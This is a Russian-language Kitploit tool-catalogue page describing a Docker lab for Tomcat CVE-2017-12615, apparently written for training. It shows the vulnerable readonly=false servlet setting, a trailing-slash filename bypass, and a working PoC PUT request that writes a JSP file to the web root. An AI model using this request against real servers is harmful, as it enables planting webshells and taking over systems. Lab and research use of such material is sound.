Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Tomcat-CVE-2017-12615 — Docker-среда для эксплуатации уязвимости Tomcat CVE-2017-12615 (произвольная запись файлов через метод PUT) с методами обхода и кодом proof-of-concept. | Kitploit
Инструменты/GitHubGitHub/cyberharsh/tomcat-cve-2017-12615
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubcyberharsh/tomcat-cve-2017-12615

Tomcat-CVE-2017-12615

Docker-среда для эксплуатации уязвимости Tomcat CVE-2017-12615 (произвольная запись файлов через метод PUT) с методами обхода и кодом proof-of-concept.

Репозиторий
16 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Уязвимость произвольной записи файлов в Tomcat через метод PUT (CVE-2017-12615)

中文版本(Chinese version)

Версия Tomcat: 8.5.19

Настройка окружения

root@kitploit:~
docker-compose build
docker-compose up -d

После успешного выполнения указанных выше команд вы увидите пример страницы Tomcat, перейдя по адресу http://your-ip:8080.

Обоснование

Ссылки:

  • http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0107097.html
  • https://mp.weixin.qq.com/s?__biz=MzI1NDg4MTIxMw==&mid=2247483659&idx=1&sn=c23b3a3b3b43d70999bdbe644e79f7e5
  • https://mp.weixin.qq.com/s?__biz=MzU3ODAyMjg4OQ==&mid=2247483805&idx=1&sn=503a3e29165d57d3c20ced671761bb5e

Tomcat устанавливает разрешение на запись (readonly=false), что приводит к возможности записи файлов на сервер.

root@kitploit:~
<servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param>
        <param-name>debug</param-name>
        <param-value>0</param-value>
    </init-param>
    <init-param>
        <param-name>listings</param-name>
        <param-value>false</param-value>
    </init-param>
    <init-param>
        <param-name>readonly</param-name>
        <param-value>false</param-value>
    </init-param>
    <load-on-startup>1</load-on-startup>
</servlet>

Хотя Tomcat в некоторой степени проверяет расширение файла (нельзя напрямую записать jsp), мы все же можем обойти это ограничение с помощью некоторых особенностей файловой системы (например, используя / в Linux).

POC

Отправьте следующие пакеты напрямую, и тогда shell будет записан в корневой каталог Web.

root@kitploit:~
PUT /1.jsp/ HTTP/1.1
Host: your-ip:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5

shell

Как показано ниже:

Скачать инструмент